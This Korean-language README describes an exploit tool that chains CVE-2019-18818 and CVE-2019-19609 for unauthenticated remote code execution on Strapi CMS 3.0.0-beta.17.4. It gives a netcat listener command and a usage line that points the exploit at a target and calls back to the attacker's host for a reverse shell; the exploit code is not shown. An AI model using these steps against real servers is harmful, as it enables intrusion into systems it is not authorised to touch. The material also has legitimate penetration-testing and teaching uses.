
Strapi CMS 3.0.0-beta.17.4 - 인증되지 않은 원격 코드 실행 (CVE-2019-18818, CVE-2019-19609)
이 익스플로잇은 Strapi CMS 프레임워크 버전 3.0.0-beta-17.4의 두 가지 취약점을 대상으로 하여 인증되지 않은 원격 코드 실행(RCE)을 가능하게 합니다.
비밀번호 분실에 대한 취약한 비밀번호 복구 메커니즘
CVSS: 9.8 - 치명적
자세한 내용: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
OS 명령어에 사용되는 특수 요소의 부적절한 처리 ('OS 명령어 삽입')
CVSS: 7.2 - 높음
자세한 내용: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
이 익스플로잇을 실행하기 전에, 아래 옵션에서 지정한 lport에서 netcat 리스너를 시작하세요.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>